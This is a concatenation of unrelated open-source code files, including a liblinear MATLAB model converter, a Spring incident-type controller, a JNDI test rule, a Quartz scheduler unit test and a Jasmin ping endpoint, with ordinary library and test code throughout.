#include <string.h>
#include <vector>
#include "../linear.h"
#include "mex.h"
using std::vector;
#ifdef MX_API_VER
#if MX_API_VER < 0x07030000
typedef int mwIndex;
#endif
#endif
#define Malloc(type,n) (type *)malloc((n)*sizeof(type))
#define NUM_OF_RETURN_FIELD 6
static const char *field_names[] = {
"Parameters",
"nr_class",
"nr_feature",
"bias",
"Label",
"w",
};
/*
 * Converts a liblinear `struct model` into a MATLAB struct with the fields
 * listed in `field_names` (Parameters, nr_class, nr_feature, bias, Label, w).
 * Fields are written in that exact order; matlab_matrix_to_model() reads
 * them back by positional index, so the order must not change.
 * Returns NULL on success (per the liblinear mex convention).
 */
const char *model_to_matlab_structure(mxArray *plhs[], struct model *model_)
{
	int i;
	int nr_w;
	double *ptr;
	mxArray *return_model, **rhs;
	int out_id = 0;
	int n, w_size;

	rhs = (mxArray **)mxMalloc(sizeof(mxArray *)*NUM_OF_RETURN_FIELD);

	// Parameters
	// for now, only solver_type is needed
	rhs[out_id] = mxCreateDoubleMatrix(1, 1, mxREAL);
	ptr = mxGetPr(rhs[out_id]);
	ptr[0] = model_->param.solver_type;
	out_id++;

	// nr_class
	rhs[out_id] = mxCreateDoubleMatrix(1, 1, mxREAL);
	ptr = mxGetPr(rhs[out_id]);
	ptr[0] = model_->nr_class;
	out_id++;

	// Binary problems (except Crammer-Singer MCSVM) store one weight vector.
	if(model_->nr_class==2 && model_->param.solver_type != MCSVM_CS)
		nr_w=1;
	else
		nr_w=model_->nr_class;

	// nr_feature
	rhs[out_id] = mxCreateDoubleMatrix(1, 1, mxREAL);
	ptr = mxGetPr(rhs[out_id]);
	ptr[0] = model_->nr_feature;
	out_id++;

	// bias
	rhs[out_id] = mxCreateDoubleMatrix(1, 1, mxREAL);
	ptr = mxGetPr(rhs[out_id]);
	ptr[0] = model_->bias;
	out_id++;

	// A non-negative bias adds one constant feature column to w.
	if(model_->bias>=0)
		n=model_->nr_feature+1;
	else
		n=model_->nr_feature;

	w_size = n;
	// Label (written as an empty matrix when the model has no labels)
	if(model_->label)
	{
		rhs[out_id] = mxCreateDoubleMatrix(model_->nr_class, 1, mxREAL);
		ptr = mxGetPr(rhs[out_id]);
		for(i = 0; i < model_->nr_class; i++)
			ptr[i] = model_->label[i];
	}
	else
		rhs[out_id] = mxCreateDoubleMatrix(0, 0, mxREAL);
	out_id++;

	// w: nr_w x w_size weight matrix, copied element-wise.
	rhs[out_id] = mxCreateDoubleMatrix(nr_w, w_size, mxREAL);
	ptr = mxGetPr(rhs[out_id]);
	for(i = 0; i < w_size*nr_w; i++)
		ptr[i]=model_->w[i];
	out_id++;

	/* Create a struct matrix contains NUM_OF_RETURN_FIELD fields */
	return_model = mxCreateStructMatrix(1, 1, NUM_OF_RETURN_FIELD, field_names);

	/* Fill struct matrix with input arguments */
	for(i = 0; i < NUM_OF_RETURN_FIELD; i++)
		mxSetField(return_model,0,field_names[i],mxDuplicateArray(rhs[i]));

	/* return */
	plhs[0] = return_model;
	mxFree(rhs);

	return NULL;
}
/*
 * Converts one or more models to MATLAB values: a single model becomes a
 * plain struct, multiple models become a cell array of structs.
 * Returns NULL on success.
 */
const char *models_to_matlab_structure(mxArray *plhs[], vector<struct model *> &pmodels)
{
	mxArray *model[1];

	if (pmodels.size() == 1)
		return model_to_matlab_structure(plhs, pmodels[0]);

	plhs[0] = mxCreateCellMatrix(pmodels.size(), 1);
	// size_t index: the original `int pn` compared signed vs. unsigned
	// against pmodels.size() (compiler warning, overflow on huge inputs).
	for (size_t pn = 0; pn < pmodels.size(); pn++)
	{
		model_to_matlab_structure(model, pmodels[pn]);
		mxSetCell(plhs[0], pn, model[0]);
	}
	return NULL;
}
const char *matlab_matrix_to_model(struct model *model_, const mxArray *matlab_struct)
{
int i, num_of_fields;
int nr_w;
double *ptr;
int id = 0;
int n, w_size;
mxArray **rhs;
num_of_fields = mxGetNumberOfFields(matlab_struct);
rhs = (mxArray **) mxMalloc(sizeof(mxArray *)*num_of_fields);
for(i=0;i<num_of_fields;i++)
rhs[i] = mxGetFieldByNumber(matlab_struct, 0, i);
model_->nr_class=0;
nr_w=0;
model_->nr_feature=0;
model_->w=NULL;
model_->label=NULL;
// Parameters
ptr = mxGetPr(rhs[id]);
model_->param.solver_type = (int)ptr[0];
id++;
// nr_class
ptr = mxGetPr(rhs[id]);
model_->nr_class = (int)ptr[0];
id++;
if(model_->nr_class==2 && model_->param.solver_type != MCSVM_CS)
nr_w=1;
else
nr_w=model_->nr_class;
// nr_feature
ptr = mxGetPr(rhs[id]);
model_->nr_feature = (int)ptr[0];
id++;
// bias
ptr = mxGetPr(rhs[id]);
model_->bias = (int)ptr[0];
id++;
if(model_->bias>=0)
n=model_->nr_feature+1;
else
n=model_->nr_feature;
w_size = n;
// Label
if(mxIsEmpty(rhs[id]) == 0)
{
model_->label = Malloc(int, model_->nr_class);
ptr = mxGetPr(rhs[id]);
for(i=0;i<model_->nr_class;i++)
model_->label[i] = (int)ptr[i];
}
id++;
ptr = mxGetPr(rhs[id]);
model_->w=Malloc(double, w_size*nr_w);
for(i = 0; i < w_size*nr_w; i++)
model_->w[i]=ptr[i];
id++;
mxFree(rhs);
return NULL;
}
const char * matlab_matrix_to_models(std::vector<struct model *> &pmodels, const mxArray *model_)
{
if(mxIsCell(model_))
{
mxArray *p;
int nElement = mxGetM(model_) * mxGetN(model_);
pmodels.resize(nElement);
for (int i = 0; i < nElement; ++i)
{
p = mxGetCell(model_, i);
matlab_matrix_to_model(pmodels[i], p);
}
return NULL;
}
else
{
pmodels.resize(1);
return matlab_matrix_to_model(pmodels[0], model_);
}
}
| 2,125 |
407 | <reponame>iuskye/SREWorks
package com.alibaba.sreworks.health.controllers.incident;
import com.alibaba.sreworks.health.api.incident.IncidentTypeService;
import com.alibaba.sreworks.health.domain.req.incident.IncidentTypeCreateReq;
import com.alibaba.sreworks.health.domain.req.incident.IncidentTypeUpdateReq;
import com.alibaba.tesla.common.base.TeslaBaseResult;
import com.alibaba.tesla.web.controller.BaseController;
import io.swagger.annotations.Api;
import io.swagger.annotations.ApiImplicitParam;
import io.swagger.annotations.ApiImplicitParams;
import io.swagger.annotations.ApiOperation;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.annotation.*;
/**
* 异常类型入口
*
* @author: fangzong.<EMAIL>
* @date: 2021/10/20 11:36
*/
@RestController
@RequestMapping(value = "/incident_type/")
@Api(tags = "异常类型")
public class IncidentTypeController extends BaseController {

    @Autowired
    IncidentTypeService incidentTypeService;

    /** Looks up a single incident type by its numeric id. */
    @ApiOperation(value = "查询异常类型(根据ID)")
    @ApiImplicitParams({
            @ApiImplicitParam(name = "id", value = "类型ID", paramType = "query"),
    })
    @RequestMapping(value = "getIncidentTypeById", method = RequestMethod.GET)
    public TeslaBaseResult getIncidentTypeById(@RequestParam(name = "id") Integer id) {
        return buildSucceedResult(incidentTypeService.getIncidentTypeById(id));
    }

    /** Lists all incident types. */
    @ApiOperation(value = "查询异常类型列表")
    @RequestMapping(value = "getIncidentTypes", method = RequestMethod.GET)
    public TeslaBaseResult getIncidentTypes() {
        return buildSucceedResult(incidentTypeService.getIncidentTypes());
    }

    /**
     * Creates an incident type; the calling user (x-empid header) is recorded
     * as both creator and last modifier.
     */
    @ApiOperation(value = "创建异常类型")
    @RequestMapping(value = "createIncidentType", method = RequestMethod.POST)
    public TeslaBaseResult createIncidentType(@RequestHeader(name = "x-empid", required = false) String userId,
                                              @RequestBody IncidentTypeCreateReq req) throws Exception {
        req.setCreator(userId);
        req.setLastModifier(userId);
        return buildSucceedResult(incidentTypeService.addIncidentType(req));
    }

    /**
     * Updates an incident type.
     * NOTE(review): this overwrites the creator with the updating user
     * (req.setCreator), mirroring createIncidentType — confirm that updates
     * are really meant to change the creator field.
     */
    @ApiOperation(value = "更新异常类型")
    @RequestMapping(value = "updateIncidentType", method = RequestMethod.POST)
    public TeslaBaseResult updateIncidentType(@RequestHeader(name = "x-empid", required = false) String userId,
                                              @RequestBody IncidentTypeUpdateReq req) throws Exception {
        req.setCreator(userId);
        req.setLastModifier(userId);
        return buildSucceedResult(incidentTypeService.updateIncidentType(req));
    }

    /**
     * Deletes an incident type by id.
     * NOTE(review): the Swagger label "定义ID" differs from the "类型ID" used by
     * getIncidentTypeById — looks like a copy-paste leftover; confirm.
     */
    @ApiOperation(value = "删除异常类型")
    @ApiImplicitParams({
            @ApiImplicitParam(name = "id", value = "定义ID", paramType = "query", required = true)
    })
    @RequestMapping(value = "deleteIncidentType", method = RequestMethod.DELETE)
    public TeslaBaseResult deleteIncidentType(@RequestParam(name = "id") Integer id) throws Exception {
        return buildSucceedResult(incidentTypeService.deleteIncidentType(id));
    }
}
| 1,233 |
/* Function marked deprecated: any call site should trigger a
 * -Wdeprecated-declarations diagnostic. */
extern void old() __attribute__((deprecated));

/* Compiler-diagnostics test case: the call to old() is intentional and
 * exists solely to provoke the deprecation warning — do not "fix" it. */
static void warnings8() {
    old();
}
| 26 |
5,249 | /*
* Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#ifndef NV_INFER_CONSISTENCY_IMPL_H
#define NV_INFER_CONSISTENCY_IMPL_H
namespace nvinfer1
{
//!
//! \file NvInferConsistencyImpl.h
//!
//! This file contains definitions for API methods that cross the shared library boundary. These
//! methods must not be called directly by applications; they should only be called through the
//! API classes.
//!
namespace apiv
{
//! Internal ABI-stable interface behind the public consistency-checker API.
//! Per the file comment, applications must not call these methods directly;
//! they are invoked only through the API classes.
class VConsistencyChecker
{
public:
    virtual ~VConsistencyChecker() noexcept = default;
    //! Returns whether the consistency validation succeeded.
    virtual bool validate() const noexcept = 0;
};
} // namespace nvinfer1
#endif // NV_INFER_CONSISTENCY_IMPL_H
| 369 |
390 | /*
* Copyright 2017 <NAME>
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
* an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
* specific language governing permissions and limitations under the License.
*/
package org.tinylog.rules;
import java.util.HashMap;
import java.util.Hashtable;
import java.util.Map;
import javax.naming.Binding;
import javax.naming.CompositeName;
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.Name;
import javax.naming.NameAlreadyBoundException;
import javax.naming.NameClassPair;
import javax.naming.NameNotFoundException;
import javax.naming.NameParser;
import javax.naming.NamingEnumeration;
import javax.naming.NamingException;
import javax.naming.spi.InitialContextFactory;
import org.junit.rules.TestRule;
import org.junit.runner.Description;
import org.junit.runners.model.Statement;
/**
* Rule for providing an implementation for {@link InitialContext} with basic methods for bindings and lookups.
*/
public class InitialContextRule implements TestRule {
	/** Creates the rule. */
	public InitialContextRule() {
	}

	/**
	 * Wraps the test statement so it runs with {@link SimpleInitialContextFactory}
	 * installed as the JNDI initial context factory.
	 */
	@Override
	public Statement apply(final Statement base, final Description description) {
		return new ContextStatement(base);
	}
	/**
	 * Context factory for {@link SimpleContext}. Hands out the single shared
	 * context instance installed by the surrounding rule.
	 */
	public static final class SimpleInitialContextFactory implements InitialContextFactory {

		// Shared across threads; written by the rule before/after each test.
		private static volatile SimpleContext context;

		/** Public no-arg constructor, required by the JNDI SPI. */
		public SimpleInitialContextFactory() {
		}

		@Override
		public Context getInitialContext(final Hashtable<?, ?> environment) {
			return context;
		}

	}
/**
* JUnit statement that registers {@link SimpleInitialContextFactory} as initial context factory before running a
* test. As soon as a test is done, the initial context factory will be unregistered.
*/
private static final class ContextStatement extends Statement {
private final Statement base;
/**
* @param base
* Base statement the contains the test
*/
private ContextStatement(final Statement base) {
this.base = base;
}
@Override
public void evaluate() throws Throwable {
SimpleInitialContextFactory.context = new SimpleContext();
String property = System.getProperty(Context.INITIAL_CONTEXT_FACTORY);
System.setProperty(Context.INITIAL_CONTEXT_FACTORY, SimpleInitialContextFactory.class.getName());
try {
base.evaluate();
} finally {
if (property == null) {
System.clearProperty(Context.INITIAL_CONTEXT_FACTORY);
} else {
System.setProperty(Context.INITIAL_CONTEXT_FACTORY, property);
}
SimpleInitialContextFactory.context = null;
}
}
}
/**
* Simple context with basic methods for environment variables, bindings and lookups. The most other methods are not
* implemented and will throw an {@link UnsupportedOperationException}.
*/
private static final class SimpleContext implements Context {
private final Map<Name, Object> values;
private final Hashtable<Object, Object> environment;
/** */
private SimpleContext() {
values = new HashMap<>();
environment = new Hashtable<>();
}
@Override
public Object lookup(final Name name) throws NamingException {
synchronized (values) {
if (values.containsKey(name)) {
return values.get(name);
} else {
throw new NameNotFoundException();
}
}
}
@Override
public Object lookup(final String name) throws NamingException {
return lookup(new CompositeName(name));
}
@Override
public void bind(final Name name, final Object obj) {
synchronized (values) {
values.put(name, obj);
}
}
@Override
public void bind(final String name, final Object obj) throws NamingException {
bind(new CompositeName(name), obj);
}
@Override
public void rebind(final Name name, final Object obj) throws NamingException {
synchronized (values) {
if (values.containsKey(name)) {
values.put(name, obj);
} else {
throw new NameNotFoundException();
}
}
}
@Override
public void rebind(final String name, final Object obj) throws NamingException {
rebind(new CompositeName(name), obj);
}
@Override
public void unbind(final Name name) {
synchronized (values) {
values.remove(name);
}
}
@Override
public void unbind(final String name) throws NamingException {
unbind(new CompositeName(name));
}
@Override
public void rename(final Name oldName, final Name newName) throws NamingException {
synchronized (values) {
if (values.containsKey(oldName)) {
if (values.containsKey(newName)) {
throw new NameAlreadyBoundException();
} else {
values.put(newName, values.remove(oldName));
}
} else {
throw new NameNotFoundException();
}
}
}
@Override
public void rename(final String oldName, final String newName) throws NamingException {
rename(new CompositeName(oldName), new CompositeName(newName));
}
@Override
public NamingEnumeration<NameClassPair> list(final Name name) {
throw new UnsupportedOperationException();
}
@Override
public NamingEnumeration<NameClassPair> list(final String name) {
throw new UnsupportedOperationException();
}
@Override
public NamingEnumeration<Binding> listBindings(final Name name) {
throw new UnsupportedOperationException();
}
@Override
public NamingEnumeration<Binding> listBindings(final String name) {
throw new UnsupportedOperationException();
}
@Override
public void destroySubcontext(final Name name) {
throw new UnsupportedOperationException();
}
@Override
public void destroySubcontext(final String name) {
throw new UnsupportedOperationException();
}
@Override
public Context createSubcontext(final Name name) {
throw new UnsupportedOperationException();
}
@Override
public Context createSubcontext(final String name) {
throw new UnsupportedOperationException();
}
@Override
public Object lookupLink(final Name name) {
throw new UnsupportedOperationException();
}
@Override
public Object lookupLink(final String name) {
throw new UnsupportedOperationException();
}
@Override
public NameParser getNameParser(final Name name) {
throw new UnsupportedOperationException();
}
@Override
public NameParser getNameParser(final String name) {
throw new UnsupportedOperationException();
}
@Override
public Name composeName(final Name name, final Name prefix) {
throw new UnsupportedOperationException();
}
@Override
public String composeName(final String name, final String prefix) {
throw new UnsupportedOperationException();
}
@Override
public Object addToEnvironment(final String propName, final Object propVal) {
return environment.put(propName, propVal);
}
@Override
public Object removeFromEnvironment(final String propName) {
return environment.remove(propName);
}
@Override
public Hashtable<?, ?> getEnvironment() {
return new Hashtable<>(environment);
}
@Override
public void close() {
}
@Override
public String getNameInNamespace() {
throw new UnsupportedOperationException();
}
}
}
| 2,394 |
595 | <gh_stars>100-1000
/******************************************************************************
* Copyright (c) 2020 - 2021 Xilinx, Inc. All rights reserved.
* SPDX-License-Identifier: MIT
******************************************************************************/
/*****************************************************************************/
/**
*
* @file xplm_stl.h
*
* This file contains the header functions of wrapper Xilstl
*
* <pre>
* MODIFICATION HISTORY:
*
* Ver Who Date Changes
* ----- ---- -------- -------------------------------------------------------
* 1.00 rama 08/12/2020 Initial release
* 1.01 rama 03/22/2021 Updated hook for periodic STL execution and FTTI
* configuration
*
* </pre>
*
* @note
*
******************************************************************************/
#ifndef XPLM_STL_H
#define XPLM_STL_H

#ifdef __cplusplus
extern "C" {
#endif

/* Entire API is compiled out unless the PLM build enables the XilSTL wrapper. */
#ifdef PLM_ENABLE_STL

/***************************** Include Files *********************************/

/************************** Constant Definitions *****************************/
/* Default FTTI (fault-tolerant time interval) used when no value is
 * configured; units are not stated in this header — TODO confirm against the
 * XilSTL documentation. */
#define DEFAULT_FTTI_TIME		(90U)

/**************************** Type Definitions *******************************/

/***************** Macros (Inline Functions) Definitions *********************/

/************************** Function Prototypes ******************************/
/* One-time initialization of the XilSTL wrapper; returns an XST status code. */
int XPlm_StlInit(void);
/* Hook invoked periodically to run STL tests (see modification history). */
int XPlm_PeriodicStlHook(void);

/************************** Variable Definitions *****************************/

#endif  /* PLM_ENABLE_STL */

#ifdef __cplusplus
}
#endif

#endif  /* XPLM_STL_H */
| 434 |
1,016 | package com.thinkbiganalytics.scheduler;
/*-
* #%L
* thinkbig-scheduler-quartz
* %%
* Copyright (C) 2017 ThinkBig Analytics
* %%
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* #L%
*/
import com.thinkbiganalytics.scheduler.model.DefaultTriggerIdentifier;
import com.thinkbiganalytics.scheduler.quartz.MockJob;
import org.junit.Before;
import org.junit.Test;
import org.mockito.Mock;
import org.mockito.Mockito;
import org.mockito.MockitoAnnotations;
import org.mockito.internal.util.reflection.Whitebox;
import org.quartz.JobDetail;
import org.quartz.JobKey;
import org.quartz.Scheduler;
import org.quartz.SchedulerException;
import org.quartz.Trigger;
import org.quartz.TriggerKey;
import org.quartz.impl.JobDetailImpl;
import org.quartz.impl.matchers.GroupMatcher;
import org.springframework.scheduling.quartz.SchedulerFactoryBean;
import java.util.ArrayList;
import java.util.Date;
import java.util.HashSet;
import java.util.List;
import java.util.Set;
import java.util.TimeZone;
import java.util.Vector;
import static junit.framework.Assert.assertEquals;
import static junit.framework.Assert.assertTrue;
import static junit.framework.TestCase.assertNotNull;
import static org.junit.Assert.fail;
import static org.mockito.Matchers.any;
import static org.mockito.Matchers.anyObject;
import static org.mockito.Matchers.eq;
import static org.mockito.Mockito.doThrow;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.times;
import static org.mockito.Mockito.verify;
import static org.mockito.Mockito.when;
/**
 * Unit tests for {@code QuartzScheduler}. The underlying Quartz {@link Scheduler} is mocked,
 * so these tests verify only that {@code QuartzScheduler} delegates to the right Quartz calls
 * and translates {@link SchedulerException} into {@code JobSchedulerException}.
 */
public class QuartzSchedulerTest {

    QuartzScheduler toTest;

    @Mock
    QuartzClusterMessageSender clusterMessageSender;
    @Mock
    QuartzClusterMessageReceiver clusterMessageReceiver;
    @Mock
    JobIdentifier jobIdentifier;
    @Mock
    SchedulerFactoryBean schedulerFactoryBean;
    @Mock
    Scheduler scheduler;

    // No-op payload handed to the scheduler in every scheduling test.
    Runnable task = new Runnable() {
        @Override
        public void run() {
            // intentionally empty
        }
    };

    @Before
    public void before() {
        MockitoAnnotations.initMocks(this);
        when(schedulerFactoryBean.getScheduler()).thenReturn(scheduler);
        toTest = new QuartzScheduler();
        toTest.schedulerFactoryBean = schedulerFactoryBean;
        // clusterMessageSender is package-private in the tested class; injected via reflection.
        Whitebox.setInternalState(toTest, "clusterMessageSender", clusterMessageSender);
        mockJobIdentifier("job-name", "group");
    }

    @Test
    public void scheduleWithCronExpressionInTimeZoneTest() throws Exception {
        mockJobIdentifier("job-name", "group");
        toTest.scheduleWithCronExpressionInTimeZone(jobIdentifier, task, "0 0 12 * * ?",
                                                    TimeZone.getTimeZone("UTC"));
        verify(jobIdentifier).getName();
        verify(jobIdentifier, times(2)).getGroup();
    }

    @Test
    public void scheduleTest() throws Exception {
        mockJobIdentifier("job-name", "group");
        toTest.schedule(jobIdentifier, task, new Date());
        verify(scheduler).scheduleJob((JobDetail) any(), (Trigger) any());
    }

    @Test
    public void scheduleAtFixedRateTest() throws Exception {
        mockJobIdentifier("job-name", "group");
        toTest.scheduleAtFixedRate(jobIdentifier, task, 1l);
        verify(scheduler).scheduleJob((JobDetail) any(), (Trigger) any());
    }

    @Test
    public void scheduleAtFixedRateTest2() throws Exception {
        mockJobIdentifier("job-name", "group");
        toTest.scheduleAtFixedRate(jobIdentifier, task, new Date(), 1l);
        verify(scheduler).scheduleJob((JobDetail) any(), (Trigger) any());
    }

    @Test
    public void startSchedulerTest() throws Exception {
        toTest.startScheduler();
        verify(scheduler).start();
        // Once the delegate throws, a JobSchedulerException is expected;
        // reaching fail() means the exception was not translated.
        doThrow(new SchedulerException()).when(scheduler).start();
        try {
            toTest.startScheduler();
        } catch (final JobSchedulerException e) {
            return;
        }
        fail();
    }

    @Test
    public void pauseSchedulerTest() throws Exception {
        toTest.pauseScheduler();
        verify(scheduler).standby();
        doThrow(new SchedulerException()).when(scheduler).standby();
        try {
            toTest.pauseScheduler();
        } catch (final JobSchedulerException e) {
            return;
        }
        fail();
    }

    @Test
    public void triggerJobTest() throws Exception {
        mockJobIdentifier("job-name", "group");
        toTest.triggerJob(jobIdentifier);
        verify(scheduler).triggerJob(eq(new JobKey("job-name", "group")));
        doThrow(new SchedulerException()).when(scheduler).triggerJob((JobKey) any());
        try {
            toTest.triggerJob(jobIdentifier);
        } catch (final JobSchedulerException e) {
            return;
        }
        fail();
    }

    @SuppressWarnings({"rawtypes", "unchecked"})
    @Test
    public void pauseTriggersOnJobTest() throws Exception {
        mockJobIdentifier("job-name", "group");
        final List list = new ArrayList<Trigger>();
        addMockTrigger(list, "trigger-key-name", "trigger-key-name");
        when(scheduler.getTriggersOfJob(eq(new JobKey("job-name", "group")))).thenReturn(list);
        toTest.pauseTriggersOnJob(jobIdentifier);
        verify(scheduler).pauseTrigger(eq(new TriggerKey("trigger-key-name", "trigger-key-name")));
        doThrow(new SchedulerException()).when(scheduler).getTriggersOfJob((JobKey) any());
        try {
            toTest.pauseTriggersOnJob(jobIdentifier);
        } catch (final JobSchedulerException e) {
            return;
        }
        fail();
    }

    @SuppressWarnings({"rawtypes", "unchecked"})
    @Test
    public void resumeTriggersOnJobTest() throws Exception {
        mockJobIdentifier("job-name", "group");
        final List list = new ArrayList<Trigger>();
        addMockTrigger(list, "trigger-key-name", "trigger-key-name");
        when(scheduler.getTriggersOfJob(eq(new JobKey("job-name", "group")))).thenReturn(list);
        toTest.resumeTriggersOnJob(jobIdentifier);
        verify(scheduler).resumeTrigger(eq(new TriggerKey("trigger-key-name", "trigger-key-name")));
        doThrow(new SchedulerException()).when(scheduler).getTriggersOfJob((JobKey) any());
        try {
            toTest.resumeTriggersOnJob(jobIdentifier);
        } catch (final JobSchedulerException e) {
            return;
        }
        fail();
    }

    @Test
    public void updateTriggerTest() throws Exception {
        toTest.updateTrigger(new DefaultTriggerIdentifier("trigger-key-name", "trigger-key-name"),
                             "0 0 12 * * ?");
        verify(scheduler).rescheduleJob(eq(new TriggerKey("trigger-key-name", "trigger-key-name")),
                                        (Trigger) any());
        doThrow(new SchedulerException()).when(scheduler).rescheduleJob((TriggerKey) any(),
                                                                        (Trigger) any());
        try {
            toTest.updateTrigger(new DefaultTriggerIdentifier("trigger-key-name", "trigger-key-name"),
                                 "0 0 12 * * ?");
        } catch (final JobSchedulerException e) {
            return;
        }
        fail();
    }

    @Test
    public void deleteJobTest() throws Exception {
        mockJobIdentifier("job-name", "group");
        toTest.deleteJob(jobIdentifier);
        verify(scheduler).deleteJob(eq(new JobKey("job-name", "group")));
        doThrow(new SchedulerException()).when(scheduler).deleteJob((JobKey) any());
        try {
            toTest.deleteJob(jobIdentifier);
        } catch (final JobSchedulerException e) {
            return;
        }
        fail();
    }

    @Test
    public void scheduleWithCronExpression() throws Exception {
        mockJobIdentifier("job-name", "group");
        toTest.scheduleWithCronExpression(jobIdentifier, task, "0 0 12 * * ?");
        verify(jobIdentifier).getName();
        verify(jobIdentifier, times(2)).getGroup();
    }

    @Test
    public void testGetJobs() throws Exception {
        // One group containing one job with one trigger should yield exactly one JobInfo.
        Vector<String> jobGroupNames = new Vector<>();
        jobGroupNames.add("group");
        Mockito.when(scheduler.getJobGroupNames()).thenReturn(jobGroupNames);
        Set<JobKey> set = new HashSet<>();
        set.add(new JobKey("name", "group"));
        Mockito.when(scheduler.getJobKeys((GroupMatcher) anyObject())).thenReturn(set);
        Mockito.when(scheduler.getJobDetail((JobKey) anyObject())).thenReturn(new JobDetailImpl("name", "group", MockJob.class));
        List v = new Vector<>();
        addMockTrigger(v, "name", "group");
        Mockito.when(scheduler.getTriggerState((TriggerKey) Mockito.anyObject())).thenReturn(Trigger.TriggerState.BLOCKED);
        Mockito.when(scheduler.getTriggersOfJob((JobKey) anyObject())).thenReturn(v);
        assertTrue(toTest.getJobs().size() == 1);
    }

    @Test
    public void scheduleAtFixedDelayTest1() throws Exception {
        mockJobIdentifier("job-name", "group");
        toTest.scheduleWithFixedDelay(jobIdentifier, task, 0l);
        verify(scheduler).scheduleJob((JobDetail) any(), (Trigger) any());
    }

    @Test
    public void scheduleAtFixedRateWithDelayTest() throws Exception {
        mockJobIdentifier("job-name", "group");
        toTest.scheduleAtFixedRateWithDelay(jobIdentifier, task, "run", new Date(), 1l, 1L);
        verify(scheduler).scheduleJob((JobDetail) any(), (Trigger) any());
    }

    @Test
    public void scheduleAtFixedDelayTest2() throws Exception {
        mockJobIdentifier("job-name", "group");
        toTest.scheduleWithFixedDelay(jobIdentifier, task, new Date(), 0l);
        verify(scheduler).scheduleJob((JobDetail) any(), (Trigger) any());
    }

    @Test
    public void staticHelperTest() throws Exception {
        // Round-trip conversions between Quartz keys and scheduler identifiers keep the name.
        JobIdentifier identifier = QuartzScheduler.jobIdentifierForJobKey(new JobKey("job-name", "group"));
        JobKey jobKey = QuartzScheduler.jobKeyForJobIdentifier(identifier);
        assertEquals(jobKey.getName(), identifier.getName());

        TriggerKey triggerKey = new TriggerKey("trigger-key-name", "trigger-key-name");
        TriggerIdentifier triggerIdentifier = QuartzScheduler.triggerIdentifierForTriggerKey(triggerKey);
        triggerKey = QuartzScheduler.triggerKeyForTriggerIdentifier(triggerIdentifier);
        assertEquals(triggerKey.getName(), triggerIdentifier.getName());
    }

    @Test
    public void buildTriggerInfo() throws Exception {
        JobDetailImpl detail = new JobDetailImpl();
        detail.setName("job-name");
        JobInfo info = toTest.buildJobInfo(detail);
        assertNotNull(info);
    }

    @Test
    public void scheduleAtFixedDelayTest3() throws Exception {
        mockJobIdentifier("job-name", "group");
        toTest.scheduleWithFixedDelay(jobIdentifier, task, "run", new Date(), 0l);
        verify(scheduler).scheduleJob((JobDetail) any(), (Trigger) any());
    }

    @Test
    public void controlTests() throws Exception {
        // Smoke test: these must simply not throw against the mocked scheduler.
        toTest.pauseAll();
        toTest.resumeAll();
        toTest.getMetaData();
    }

    @Test
    public void existsTests() throws Exception {
        // Smoke test for the exists/lookup helpers against the mocked scheduler.
        Set<JobKey> set = new HashSet<>();
        set.add(new JobKey("name", "group"));
        Mockito.when(scheduler.getJobKeys((GroupMatcher) anyObject())).thenReturn(set);
        toTest.jobExists(jobIdentifier);
        TriggerIdentifier triggerIdentifer = new DefaultTriggerIdentifier("trigger-key-name", "trigger-key-name");
        toTest.triggerExists(triggerIdentifer);
        toTest.resumeAll();
        toTest.getMetaData();
    }

    // Stubs the shared jobIdentifier mock with the given name/group.
    private void mockJobIdentifier(String jobName, String groupName) {
        when(jobIdentifier.getName()).thenReturn(jobName);
        when(jobIdentifier.getGroup()).thenReturn(groupName);
    }

    // Adds a mock Trigger whose key is (triggerKeyName, triggerKeyGroup) to the given list.
    @SuppressWarnings({"unchecked", "rawtypes"})
    private void addMockTrigger(final List list, String triggerKeyName, String triggerKeyGroup) {
        final Trigger trigger = mock(Trigger.class);
        final TriggerKey triggerKey = new TriggerKey(triggerKeyName, triggerKeyGroup);
        when(trigger.getKey()).thenReturn(triggerKey);
        list.add(trigger);
    }
}
| 5,088 |
750 | <reponame>paradiseng/jasmin
from twisted.web.resource import Resource
class Ping(Resource):
    """Health-check resource answering ``GET /ping`` with ``Jasmin/PONG``."""

    # BUGFIX: Twisted's resource traversal inspects the class attribute
    # ``isLeaf`` (camel case). The previous lowercase ``isleaf`` was a typo
    # and had no effect, so this resource was not actually marked as a leaf.
    isLeaf = True

    def __init__(self, log):
        """:param log: logger used to record incoming pings."""
        Resource.__init__(self)
        self.log = log

    def render_GET(self, request):
        """
        /ping request processing

        Note: Ping is used to check Jasmin's http api
        """
        self.log.debug("Rendering /ping response with args: %s from %s",
                       request.args, request.getClientIP())
        self.log.info("Received ping from %s", request.getClientIP())
        request.setResponseCode(200)
        return b'Jasmin/PONG'
| 265 |
471 | from django.contrib import admin
from custom.m4change.models import McctStatus
class McctStatusAdmin(admin.ModelAdmin):
    # Django admin configuration for m4change mCCT status records:
    # shows the full status/audit trail per form and allows lookup by form id.
    model = McctStatus
    list_display = ('form_id', 'status', 'domain', 'reason', 'received_on', 'registration_date', 'immunized',
                    'is_booking', 'is_stillbirth', 'modified_on', 'user')
    search_fields = ('form_id',)


admin.site.register(McctStatus, McctStatusAdmin)
| 153 |
1,144 | package de.metas.migration.cli.rollout_migrate;
import de.metas.migration.IDatabase;
import de.metas.migration.IScript;
import de.metas.migration.IScriptsRegistry;
